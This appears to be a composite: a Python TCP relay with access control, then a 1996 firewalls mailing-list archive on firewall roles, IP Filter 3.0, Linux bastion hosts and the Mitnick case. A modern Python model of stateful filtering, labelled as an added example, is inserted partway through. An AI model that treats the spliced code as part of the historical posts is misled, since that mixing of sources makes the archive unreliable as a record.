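# Hypothetical relay table, constructed for this example: the port the relay
# listens on, mapped to the single (host, port) it will connect to.  The host
# names are placeholders, not real service addresses.
RELAYS = {
    2023: ("lexis.example.net", 23),
    2024: ("westlaw.example.net", 23),
}

# Internal segments that may use the relay (placeholder networks); everything
# else is refused before any outbound connection is made.
ALLOWED_SOURCES = [ipaddress.ip_network("10.1.0.0/16"),
                   ipaddress.ip_network("10.2.0.0/16")]


def source_allowed(addr, allowed=ALLOWED_SOURCES):
    """True if the client's address lies inside one of the permitted networks."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in allowed)


def pump(a, b, bufsize=4096):
    """Copy bytes between two connected sockets in both directions until either
    side closes.  Returns (bytes a->b, bytes b->a) so the caller can log them."""
    peer = {a: b, b: a}
    counted = {a: 0, b: 0}
    live = [a, b]
    while len(live) == 2:
        readable, _, _ = select.select(live, [], [])
        for s in readable:
            data = s.recv(bufsize)
            if not data:                 # EOF from this side ends the session
                live.remove(s)
                break
            peer[s].sendall(data)
            counted[s] += len(data)
    for s in (a, b):
        try:
            s.shutdown(socket.SHUT_RDWR)
        except OSError:
            pass                         # already closed by the remote end
        s.close()
    return counted[a], counted[b]


def serve(listen_port, dest, allowed=ALLOWED_SOURCES):
    """Accept connections on listen_port and plug each one into dest."""
    host, port = dest
    ls = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ls.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    ls.bind(("0.0.0.0", listen_port))
    ls.listen(16)
    while True:
        client, (caddr, cport) = ls.accept()
        if not source_allowed(caddr, allowed):
            print(f"refused {caddr}:{cport} -> {host}:{port}")
            client.close()
            continue
        try:
            upstream = socket.create_connection((host, port), timeout=30)
            upstream.settimeout(None)    # timeout only for the connect phase
        except OSError as exc:
            print(f"cannot reach {host}:{port}: {exc}")
            client.close()
            continue
        print(f"relay {caddr}:{cport} -> {host}:{port}")
        threading.Thread(target=pump, args=(client, upstream), daemon=True).start()


def demo_local():
    """Exercise pump() over two local socket pairs, no network needed.
    Returns (what the 'server' saw, what the 'client' saw, byte counts)."""
    client, relay_in = socket.socketpair()
    relay_out, server = socket.socketpair()
    result = []
    worker = threading.Thread(target=lambda: result.append(pump(relay_in, relay_out)))
    worker.start()
    client.sendall(b"hello")
    seen_by_server = server.recv(64)
    server.sendall(b"world!")
    seen_by_client = client.recv(64)
    client.close()                       # client hangs up: relay tears down
    worker.join(5)
    server.close()
    return seen_by_server, seen_by_client, result[0]


if __name__ == "__main__":
    for lport, dest in RELAYS.items():
        threading.Thread(target=serve, args=(lport, dest), daemon=True).start()
    threading.Event().wait()             # run until killed
```

Caveats a practitioner would want before deploying something like this: a plug relay only works for protocols that do not embed addresses in the data stream (telnet to a fixed host is fine, active-mode FTP is not), and the upstream connection is exactly as unauthenticated and unencrypted as if the client had connected directly. The relay adds access control, a choke point and a log line, not confidentiality.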
From firewalls-owner Sun Jan 14 17:25:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA07014 for firewalls-outgoing; Sun, 14 Jan 1996 17:20:31 -0800 (PST) Received: from druid.reston.mci.net (druid.Reston.mci.net [166.45.1.38]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA07000 for ; Sun, 14 Jan 1996 17:20:23 -0800 (PST) Received: from ddrew.reston.mci.net (ddrew.Reston.mci.net [204.70.130.71]) by druid.reston.mci.net (8.6.12/8.6.6) with SMTP id UAA03874; Sun, 14 Jan 1996 20:17:38 -0500 Date: Sun, 14 Jan 1996 20:17:38 -0500 Message-Id: <199601150117.UAA03874@druid.reston.mci.net> X-Sender: ddrew@166.45.1.38 X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: john paine , Rolf Weber From: Dale Drew Subject: Re: "Title for Firewall Admin? Cc: firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I've resisted the urge long enough to contribute to a fluff post. I've always favored "Packet Cop". At 04:34 PM 1/14/96 -0800, john paine wrote: > > >On Sun, 14 Jan 1996, Rolf Weber wrote: > >> > The mail administrator is "postmaster" >> > The web server admin is "webmaster" >> > Is there such a title for a firewall administrator? >> >> steamroller. > > How about pyromancer? 
> =============================================================== Dale Drew MCI Telecommunications Manager internetMCI Security Engineering Voice: 703/715-7058 Internet: ddrew@mci.net Fax: 703/715-7066 MCIMAIL: Dale_Drew/644-3335 From firewalls-owner Sun Jan 14 18:31:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA10307 for firewalls-outgoing; Sun, 14 Jan 1996 17:56:16 -0800 (PST) Received: from grizzly.ucla.edu (grizzly.ucla.edu [164.67.128.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA15697 for ; Wed, 10 Jan 1996 16:35:26 -0800 (PST) Received: from UNEX.UCLA.EDU ([128.97.218.2]) by grizzly.ucla.edu (8.6.9/8.6.9) with SMTP id QAA34098 for ; Wed, 10 Jan 1996 16:26:02 -0800 Received: from Microsoft Mail (PU Serial #1550) by UNEX.UCLA.EDU (PostalUnion/SMTP(tm) v2.1.8d for Windows NT(tm)) id AA-1996Jan10.162300.1550.44488; Wed, 10 Jan 1996 16:28:15 -0800 From: BGoodin@UNEX.UCLA.EDU (Goodin, Bill) To: firewalls@greatcircle.com (List-Security firewalls) Message-ID: <1996Jan10.162300.1550.44488@UNEX.UCLA.EDU> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: UCLA Extension - contact Postmaster@unex.ucla.edu for problems. Date: Wed, 10 Jan 1996 16:28:15 -0800 Subject: UCLA Short Course on "Network and Comput Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On April 16-19, 1996, UCLA Extension will present the short course, "Network and Computer Security: Principles and Applications", on the UCLA campus in Los Angeles. The instructors are Cristi Garvey, MS, Illustra Information Technologies; Thomas Haigh, PhD, Secure Computing Corp; Stephen Kent, PhD, Bolt Beranek and Newman; and Amy Wu, MS, TRW. The overall objective of this course is to present a summary of the current state of practice in trust technology with an emphasis on network security technology. 
Almost every commercial and government system fielded today has to address some aspect of security and privacy. Yet computer security technology increasingly lags information technology. While there are numerous government-endorsed products on the Evaluated Products List, these trusted products do not necessarily deal with issues germane to the commercial sector. Nor do they offer much variety in their solutions. Even when the operating system, the database management system, and the network have been selected from the evaluated products based on government regulations (such as TCSEC, TNI and TDI), the composite system may or may not be secure because trusted systems cannot always be interconnected to produce a larger system that is secure.

With the recent explosion in telecommunications technology, the many network offerings alone present a challenge to the system architect. Understanding network security protocols and functionality and how to use them effectively to design secure systems is essential in today's information environment.

This course presents an overview of the security products and technology available today, along with an in-depth look at network security principles and protocol standards. A key element of many systems today is the need for a network architecture often supported by one or more firewall products. The lectures present various network security architectures, implementation alternatives, and ways to protect your system against malicious code attacks. The course also looks at what the Defense Information Systems Agency is doing to address security needs in the government.

The course fee is $1395, which includes extensive course materials.
For additional information and a complete course description, please contact Marcus Hennessy at:
(310) 825-1047
(310) 206-2815 fax
mhenness@unex.ucla.edu

From firewalls-owner Sun Jan 14 21:25:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA01666 for firewalls-outgoing; Sun, 14 Jan 1996 21:21:46 -0800 (PST) Received: from uni.ins.com (uni.ins.com [199.0.193.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id VAA01634 for ; Sun, 14 Jan 1996 21:21:37 -0800 (PST) Received: from markpc.ins.com (markpc.ins.com [199.0.193.183]) by uni.ins.com (8.6.12/8.6.12) with SMTP id VAA12606; Sun, 14 Jan 1996 21:20:25 -0800 Date: Sun, 14 Jan 1996 21:20:25 -0800 Message-Id: <199601150520.VAA12606@uni.ins.com> X-Sender: kadrich@uni.ins.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Warren Moore , firewalls-digest From: "Mark S. Kadrich" Subject: Re: A1 Systems? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I believe that the rainbow series serves its purpose by defining what a 'perfect' system would behave like. We must keep in mind that this definition gives us a method to objectively (supposedly:) describe relative strength of compared systems. A stake in the ground if you will.

Creeping Featurism is a fact of commercial computing. By knowing what a 'secure' system looks like we can maintain our objectivity and judge a product by its capabilities as well as its liabilities.

BTW, I thought part of our business _was_ assurance. The assurance of people, as well as cats...;-)

mark

At 08:38 AM 12/1/95, Warren Moore wrote:
>My mailer thinks mjr said:
>
>> There's no need to -- you already explained (more tersely than
>>I did) the problem with the orange book earlier on in your comments.
>>
>> It's not about features, it's about assurance.
>> Commercial computing is about features (represented as functionality)
>> Therefore orange book is irrelevant to commercial computing.
>>
>
>With apologies to Marcus' cats (and my own), Isn't this like saying
>
> ...Owning Cats...
>
> Isn't about petting, it's about mousing.
> Feeling good is about petting (represented as purrs)
> Therefore owning cats is irrelevant to feeling good?
>
>Not even considering that you might be up to your fanny in mice, neither
>Marcus' or my logical construct is valid...because the initial premise is
>invalid on its face. A ne B, A eq C; D eq A; therefore A ne/or is irrelevant
>to C doesn't work unless A is *always* not equal to B, and A is *always* equal
>to C. Perhaps owning cats is irrelevant to feeling good, but it doesn't hurt.
>Actually, I partially agree with Marcus in that the Orange Book is *largely*
>irrelevant to commercial computing...but the last time I looked, *largely*
>doesn't mean *totally.* As a starting point, the rainbow series beats most
>things available to us. Of course, if confidentiality and assurance aren't
>part of the picture, why are we all wasting our time reading this list and
>selling security in one form or another?
>
>Warren S. Moore, CISSP
>Information Security Specialist
>Cincinnati Bell Information Systems Inc.
>
>

******************************************************************
Mark S. Kadrich, Managing Consultant, International Network Services
"The Power of Operable Networks"
Voice @ 415-254-4225, Page @ 1-800-514-0355 /\
e-mail @ kadrich@uni.ins.com ( )
Information security is a process, not a solution.
******************************************************************

From firewalls-owner Mon Jan 15 00:10:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id AAA17067 for firewalls-outgoing; Mon, 15 Jan 1996 00:07:11 -0800 (PST) Received: from iez.com ([194.218.38.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA17062 for ; Mon, 15 Jan 1996 00:07:05 -0800 (PST) Received: by iez.com (AIX 3.2/UCB 5.64/4.03) id AA07618; Mon, 15 Jan 1996 09:06:27 +0100 Received: from spibm02(172.16.13.62) by iez.com via smap (V1.3) id sma007104; Mon Jan 15 09:06:02 1996 Received: from iez.com by spibm02 (AIX 3.2/UCB 5.64/4.03) id AA16848; Mon, 15 Jan 1996 09:05:16 +0100 Message-Id: <9601150805.AA16848@spibm02> Received: from inhps-a by iez.com with SMTP (1.37.109.4/16.2) id AA09433; Mon, 15 Jan 96 09:05:14 +0100 Received: by inhps-a (1.38.193.3/16.2) id AA09766; Mon, 15 Jan 96 09:05:13 +0100 From: Rolf Weber Subject: Re: Linux as a firewall To: shaver@neon.ingenia.com (Mike Shaver) Date: Mon, 15 Jan 1996 09:05:12 +0100 (MEZ) Cc: firewalls@greatcircle.com (firewalls) In-Reply-To: <199601131716.MAA10961@neon.ingenia.com> from "Mike Shaver" at Jan 13, 96 12:16:11 pm X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> > > Ideally, in our situation, the
> > bastion host would be the firewall, the WWW server, the ftp server, the
> > Usenet news server, etc... Is this completely unrealistic?
>
> It's quite realistic... I did it last week. =)
>

I think there are 2 main reasons to build an application level firewall:

1. to increase security
2. to connect a net with non-registered addresses. If a site has only one registered IP address, proxies are an absolute need.

But I really doubt that a site with a configuration as described above would use a firewall at all, if there were not the must of reason 2.

rolf
--
-----------------------------------------
Rolf Weber | All I ask is a chance
IEZ AG D-64625 Bensheim | to prove that money
++49-6251-1309-113 | can't make me happy.

From firewalls-owner Mon Jan 15 01:40:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA21869 for firewalls-outgoing; Mon, 15 Jan 1996 01:35:10 -0800 (PST) Received: from whirlwind.momentum.com.au (whirlwind.momentum.com.au [203.2.238.131]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id BAA21864 for ; Mon, 15 Jan 1996 01:34:52 -0800 (PST) Received: (from uucp@localhost) by whirlwind.momentum.com.au (8.6.12/8.6.12) id RAA23147 for ; Mon, 15 Jan 1996 17:33:35 +0800 Received: from aristoi.momentum.com.au(203.2.238.138) by whirlwind via smap (V1.3mjr) id sma023145; Mon Jan 15 17:33:29 1996 X-Sender: todd@mailhost.momentum.com.au Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 15 Jan 1996 17:34:21 +0800 To: Firewalls@GreatCircle.COM From: todd@momentum.com.au (Todd Hooper) Subject: RE: Linux as a firewall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Chris Woods writes:
>OK, let's nip this in the bud right here. I see an OS war coming...

Agreed 100%. I didn't make my point clearly enough - regardless of the operating system, hardware, software or the phase of the moon - you need to analyse all the costs and benefits of your firewall system before putting down your money. The fact that any part of this system may or may not be free/cheap/expensive is part of, but not the complete, analysis.

One organisation is always going to have very different requirements to another. Only the organisation themselves can decide exactly what they are looking for. I was pointing out some _possible_ areas of concern.
99.9% uptime, mission critical availability and a team of engineers available 24 hours a day may not be an issue for the firewall at the local community college. However, they are the only people who have the information to decide that, not us. >This is not directed at Ed, or Todd, or anyone specific; just that we >don't need a "My OS is better than your OS" thing happening here. Absolutely...it is nowhere near as much fun as listening to 'My Z class security clearance is higher than your Captain Crunch decoder ring' ;-) Todd -- Todd Hooper Internet : todd@momentum.com.au Momentum Pty Ltd Phone : 09 380 4372 Western Australia Fax : 09 380 4371 From firewalls-owner Mon Jan 15 01:55:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA21636 for firewalls-outgoing; Mon, 15 Jan 1996 01:29:45 -0800 (PST) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id BAA21614 for ; Mon, 15 Jan 1996 01:29:36 -0800 (PST) Message-Id: <199601150929.BAA21614@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA088058167; Mon, 15 Jan 1996 20:29:27 +1100 From: Darren Reed Subject: IP Filter version 3.0 (fwd) To: Firewalls@GreatCircle.COM (Firewalls Mailing List) Date: Mon, 15 Jan 1996 20:29:27 +1100 (EDT) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk IP Filter version 3.0 Version 3.0 of introduces the following features to IP Filter: * Network Address Translation (NAT) Rules (although primitive at this stage) for rewriting the source address of an IP packet can be constructed for packets outbound on an Interface. Packets coming back in the same interface and which are found to require "unmapping" are mapped back to the original IP #. 
* maintains "state" information for TCP/UDP/ICMP packet flows For any defined filter rule, the filter can be told to "keep state", saving information specific to that packet which would be required for packets passing in the opposite direction to match and. For TCP packets, sequence/ack numbers are also stored so that only packets falling inside the window will be passed on (this protects against "stealth scanning"). A list of packet flows can be generated, along with performance stats. * maintains "state" information for individual IP fragments By using "keep frags", a packet which is fragmented and is the first fragment, will have its "pass/block" result recorded, so that further fragments which match the first are recognised. A list of first fragments can be retrieved, as well as performance statistics. * byte accounting Another pair of filter lists has been included with the prime intention of counting bytes of all packets that match, in addition to the number of packets which actually match. * Solaris 2.4 / Solaris 2.5 Port IP Filter has now been ported to Solaris 2.4/2.5, including Solaris x86. When loaded, it will attempted to attach itself to all interfaces, including ones brought up dynamically (ie PPP), and will try to dynamically remove references to devices which no longer exist. Manual intervention can be imposed, if required, to help sync IP Filter with reality. * ipsend split into ipsend, ipresend and iptest A file of machines which can be crashed (ie don't test favourably :) with iptest is included (see ip_fil3.0.1/ipsend/Crashable). Updates to this are appreciated :-) * ipsd (IP Port Scan Dectector) is included in the package * regression testing was fixed up to require less data files * all source code distribution, with patch already applied to stop iptest crashing SunOS 4.1/FreeBSD (bug in overlapping fragment dequeing). 
URL's:
http://coombs.anu.edu.au/~avalon/ip-filter.html
ftp://coombs.anu.edu.au/pub/net/kernel/ip_fil3.0.1.tar.gz

Darren

From firewalls-owner Mon Jan 15 02:25:50 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA24418 for firewalls-outgoing; Mon, 15 Jan 1996 02:10:59 -0800 (PST)
Received: from dxmint.cern.ch (dxmint.cern.ch [128.141.1.113]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id CAA24377 for ; Mon, 15 Jan 1996 02:10:42 -0800 (PST)
From: gamble@dxcoms.cern.ch
Received: from dxcoms.cern.ch by dxmint.cern.ch id AA05553; Mon, 15 Jan 1996 11:09:43 +0100
Received: from localhost.cern.ch by dxcoms.cern.ch; (5.65v3.0/1.1.8.2/28Jul95-0949AM) id AA10041; Mon, 15 Jan 1996 11:09:43 +0100
Message-Id: <9601151009.AA10041@dxcoms.cern.ch>
To: firewalls@GreatCircle.COM
Cc: gamble@dxcoms.cern.ch
Subject: Re: "Title for Firewall Admin?
In-Reply-To: Your message of "Sat, 13 Jan 96 07:31:30 +0100." <9601130631.AA23705@dxmint.cern.ch>
Date: Mon, 15 Jan 96 11:09:43 +0100
X-Mts: smtp
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> The mail administrator is "postmaster"
> The web server admin is "webmaster"
> Is there such a title for a firewall administrator?

If this is for an E-mail contact address then (IMHO) it should be "cert"

Sorry to keep this topic going ....

John.
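The "keep state", "keep frags" and byte-accounting behaviour in Darren Reed's IP Filter 3.0 announcement above, as an added toy model (this is not IP Filter's code): an outbound "pass ... keep state" rule creates a flow whose replies are admitted only while their sequence/ack numbers fall inside the tracked window, later fragments inherit the first fragment's verdict, and each rule counts packets and bytes. The packet fields, rule fields, window bookkeeping and sample addresses are assumptions made for the example.

```python
"""Toy model of the 'keep state', 'keep frags' and byte accounting that the IP Filter 3.0
announcement describes.  Added example, not IP Filter code: the packet model, the rule
fields and the TCP window bookkeeping are simplifying assumptions."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

@dataclass(frozen=True)
class Packet:
    direction: str             # "in" or "out", relative to the filtered interface
    proto: str                 # "tcp", "udp" or "icmp"
    src: str
    dst: str
    sport: int = 0             # 0 when absent (icmp, fragments after the first)
    dport: int = 0
    length: int = 40           # bytes on the wire, for byte accounting
    payload: int = 0           # TCP payload bytes
    seq: int = 0               # TCP sequence number
    ack: Optional[int] = None  # TCP ack number; None means the ACK flag is clear
    win: int = 0               # TCP advertised window
    syn: bool = False
    ip_id: int = 0             # IP identification, shared by all fragments of a datagram
    frag_offset: int = 0       # non-zero for every fragment after the first
    more_frags: bool = False

@dataclass
class Rule:
    action: str                # "pass" or "block"
    direction: str
    proto: Optional[str] = None
    keep_state: bool = False
    keep_frags: bool = False
    packets: int = 0           # accounting counters: packets and bytes matched
    nbytes: int = 0

    def matches(self, p: Packet) -> bool:
        return self.direction == p.direction and self.proto in (None, p.proto)

@dataclass
class Side:                    # bookkeeping for one direction of a TCP flow
    seen: bool = False
    end: int = 0               # highest seq + payload (+1 for SYN) sent by this side
    maxwin: int = 0            # largest window this side has advertised
    maxend: Optional[int] = None  # peer's ack + win: this side may send up to here

class Filter:
    def __init__(self, rules: List[Rule]):
        self.rules = rules
        self.state: Dict[Tuple, Tuple[Side, Side]] = {}  # flow key -> (initiator, responder)
        self.frags: Dict[Tuple, str] = {}                 # datagram key -> first fragment's verdict

    @staticmethod
    def _tcp_ok(p: Packet, me: Side, peer: Side) -> bool:
        plen = p.payload + int(p.syn)
        if not me.seen:        # first packet this way: it may only ack what the peer sent
            ok = p.ack is None or p.ack <= peer.end
        else:
            ok = ((me.maxend is None or p.seq + plen <= me.maxend)  # inside the peer's window
                  and p.seq + plen >= me.end - peer.maxwin          # not a stale retransmission
                  and (p.ack is None or p.ack <= peer.end))         # cannot ack unsent data
        if ok:
            me.seen, me.end, me.maxwin = True, max(me.end, p.seq + plen), max(me.maxwin, p.win)
            if p.ack is not None:  # our ack + win is the window the peer may now fill
                peer.maxend = max(peer.maxend or 0, p.ack + p.win)
        return ok

    def filter(self, p: Packet) -> str:
        fkey = (p.proto, p.src, p.dst, p.ip_id)
        if p.frag_offset > 0:  # later fragments carry no ports: reuse the first one's verdict
            return self.frags.get(fkey, "block")
        key, rkey = (p.proto, p.src, p.dst, p.sport, p.dport), (p.proto, p.dst, p.src, p.dport, p.sport)
        if key in self.state or rkey in self.state:       # known flow, either direction
            me, peer = self.state[key] if key in self.state else self.state[rkey][::-1]
            if p.proto != "tcp" or self._tcp_ok(p, me, peer):
                return "pass"  # inside the window (or not TCP); otherwise fall through to the rules
        matches = [r for r in self.rules if r.matches(p)]
        if not matches:
            return "block"
        match = matches[-1]    # last matching rule wins (ipfilter's default without "quick")
        match.packets, match.nbytes = match.packets + 1, match.nbytes + p.length
        if match.action == "pass" and match.keep_state and key not in self.state:
            self.state[key] = (Side(True, p.seq + p.payload + int(p.syn), p.win), Side())
        if match.keep_frags and p.more_frags:
            self.frags[fkey] = match.action
        return match.action

def demo() -> List[str]:
    # Constructed exchange (private/documentation addresses): outbound TCP handshake, a forged
    # out-of-window segment, a bare ACK probe with no flow, then a fragmented outbound UDP datagram.
    f = Filter([Rule("block", "in"), Rule("pass", "out", proto="tcp", keep_state=True),
                Rule("pass", "out", proto="udp", keep_frags=True)])
    c, s = "10.0.0.5", "192.0.2.10"
    pkts = [
        Packet("out", "tcp", c, s, 1025, 80, seq=1000, win=8192, syn=True),               # SYN
        Packet("in", "tcp", s, c, 80, 1025, seq=5000, ack=1001, win=4096, syn=True),      # SYN-ACK
        Packet("out", "tcp", c, s, 1025, 80, seq=1001, ack=5001, win=8192),               # ACK
        Packet("in", "tcp", s, c, 80, 1025, seq=99999, ack=1001, win=4096, payload=100),  # forged, outside window
        Packet("in", "tcp", s, c, 80, 1025, seq=5001, ack=1001, win=4096, payload=500),   # genuine data
        Packet("in", "tcp", s, c, 80, 2000, seq=7, ack=7, win=1),                         # ACK probe, no flow
        Packet("out", "udp", c, s, 2049, 53, length=1500, ip_id=77, more_frags=True),     # first fragment
        Packet("out", "udp", c, s, length=300, ip_id=77, frag_offset=1480),               # later fragment
        Packet("in", "udp", s, c, length=300, ip_id=78, frag_offset=1480),                # orphan fragment
    ]
    return [f.filter(p) for p in pkts]
```

The forged segment and the bare ACK probe are both refused although the flow itself stays open, which is the "stealth scanning" protection the announcement refers to.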
From firewalls-owner Mon Jan 15 02:40:49 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA25993 for firewalls-outgoing; Mon, 15 Jan 1996 02:30:30 -0800 (PST)
Received: from relay1gw.alcatel.fr (relay1gw.alcatel.fr [193.104.30.53]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id CAA25960 for ; Mon, 15 Jan 1996 02:30:12 -0800 (PST)
Received: from istans.ansf.alcatel.fr by relay1gw.alcatel.fr with SMTP (1.37.109.8/16.2) id AA04959; Mon, 15 Jan 1996 11:29:22 +0200
Received: from AHQP14 ([155.132.120.211]) by istans.ansf.alcatel.fr (4.1/SMI-4.1) id AA06477; Mon, 15 Jan 96 11:31:42 +0100
Message-Id: <9601151031.AA06477@istans.ansf.alcatel.fr>
Comments: Authenticated sender is
From: "Kare Presttun"
Organization: Alcanet International
To: Firewalls@GreatCircle.COM
Date: Mon, 15 Jan 1996 11:35:48 +0100
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7BIT
Subject: Re: Internet-access from Novell
Reply-To: Kare.Presttun@ansf.alcatel.fr
X-Mailer: Pegasus Mail for Windows (v2.01)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> > From: avos@kpmg.nl (Arjan Vos)
> Date: Sun, 14 Jan 1996 11:12:21 +0100
> Subject: Internet-access from Novell
>
> A client of mine wishes to offer access to the Internet to her employees
> (circa 50 employees). The company uses a Novell Netware 4 network with
> Netscape 2.0 installed and they are thinking about using Lan Workplace for
> the TCP/IP stack.

Arjan,

You may want to take a look at Novix from Firefox.
http://www.firefox.com/

Regards,
Kare
----------------------------------------------------------
| Kare Presttun                  Alcanet International     |
| Tel: +33 1 4058 5614           33, rue Emeriau          |
| Fax: +33 1 4058 5945           F-75015 Paris            |
| Kare.Presttun@ansf.alcatel.fr  FRANCE                   |

From firewalls-owner Mon Jan 15 05:40:49 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA01568 for firewalls-outgoing; Mon, 15 Jan 1996 05:26:48 -0800 (PST)
Received: from vulcan.iss.bnr.com (vulcan.iss.bnr.com [139.51.128.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA01563 for ; Mon, 15 Jan 1996 05:26:41 -0800 (PST)
From: Mark_W_Loveless@smtp.bnr.com
Received: from smtp.bnr.com by vulcan.iss.bnr.com (4.1/BNR/v1.0/910819) id AA23987; Mon, 15 Jan 96 07:24:19 CST
Received: from cc:Mail by smtp.bnr.com id AA821719455; Mon, 15 Jan 96 07:04:28 CST
Date: Mon, 15 Jan 96 07:04:28 CST
Message-Id: <9600158217.AA821719455@smtp.bnr.com>
To: Brain21
Cc: firewalls@GreatCircle.COM
Subject: Re[2]: Mitnick & the TCP Sequence Number Attack on Shimomura
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I'd say 2. I mean how many times have you set something up -- anything -- that might compromise security on a system. Examples are a) skipping the virus scan on bootup because you're "in a hurry" b) turn off some of the logging on a system until you can get the extra disk space next week c) allow certain r utilities on a couple boxes to make things easier for your job and you'll "watch those boxes closely". I could go on and on.

Finger, TFTP, r utilities -- there are a ton of little things out there created to make life easier. Yes they are security risks, but how many times have you wanted to use them for their convenience? Even for just a short time? ESPECIALLY on a home system....
Mark_W_Loveless@smtp.bnr.com

______________________________ Reply Separator _________________________________
Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (L
Author: Brain21 at internet
Date: 1/13/96 12:18 AM

Since my posting on Mitnick people have fallen into several camps it seems (BTW, my posting was meant to spur discussion and demonstrate a different outlook on the situation. I do NOT know what the situation was, and that is why it was full of questions. Hopefully I conveyed that, though if I did not it wouldn't be the first time). the camps are:

1) "Conspiracy" - i.e., involvement of the CIA, NSA, or any other organization with initials. (personally, I don't buy this)

2) He was careless with his own system, and overconfident (the scenario I put forth)

3) He did not have control over the security of the system that he was on (something that Frank stated, and that I stated as a possibility as well in a private email to someone else).

4) Lack of security was done on purpose in order to study hacking attempts, etc.

My personal opinion is either 2 or 3. Has anyone on the list actually discussed this with him? I would be interested in his side, since we all really only have part of the story. Anyone?
Brain21

From firewalls-owner Mon Jan 15 05:55:49 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA02053 for firewalls-outgoing; Mon, 15 Jan 1996 05:38:37 -0800 (PST)
Received: from ion3.ionet.net (ion3.ionet.net [204.96.200.8]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA02048 for ; Mon, 15 Jan 1996 05:38:34 -0800 (PST)
Received: from tektr.ionet.net (osip58.ionet.net [204.96.200.108]) by ion3.ionet.net (8.6.12/8.6.12) with SMTP id HAA02630 for ; Mon, 15 Jan 1996 07:37:32 -0600
Date: Mon, 15 Jan 1996 07:37:32 -0600
Message-Id: <199601151337.HAA02630@ion3.ionet.net>
X-Sender: tektr@ionet.net
X-Mailer: Windows Eudora Light Version 1.5.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@GreatCircle.COM
From: Tim Richardson
Subject: Scalability
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

My apologies for posting this in the Firewall news group.

Does anyone have information regarding server scalability in respect to total users accessing a system and an increase in bandwidth? I am trying to determine how to represent the future growth plans in our organization as we increase from a single T1 to multiples in order to handle additional customers. I also am trying to determine the growth impact on our web server. (i.e. CPU power, connections, etc.) I cannot find this information anywhere (Of course I am probably not looking in the right place).

Any help would be greatly appreciated.
Thanks in Advance

From firewalls-owner Mon Jan 15 06:10:49 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA02443 for firewalls-outgoing; Mon, 15 Jan 1996 05:47:12 -0800 (PST)
Received: from netcom12.netcom.com (netcom12.netcom.com [192.100.81.124]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA02436 for ; Mon, 15 Jan 1996 05:47:08 -0800 (PST)
Received: by netcom12.netcom.com (8.6.12/Netcom) id FAA23100; Mon, 15 Jan 1996 05:45:48 -0800
Date: Mon, 15 Jan 1996 05:45:47 -0800 (PST)
From: Robert Zamora
Subject: Security Advice
To: firewalls@greatcircle.com
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I am looking for advice from some of you security gurus out there.

Several of the users on my network are clamoring for Internet access. We have plans to implement a full Internet access solution, with application-level gateways, later in the year. However, depending on the level of risk, I would like to provide some of these users with a temporary method of attaining Internet connectivity that I can control, before they start bringing in modems and establishing covert connections.

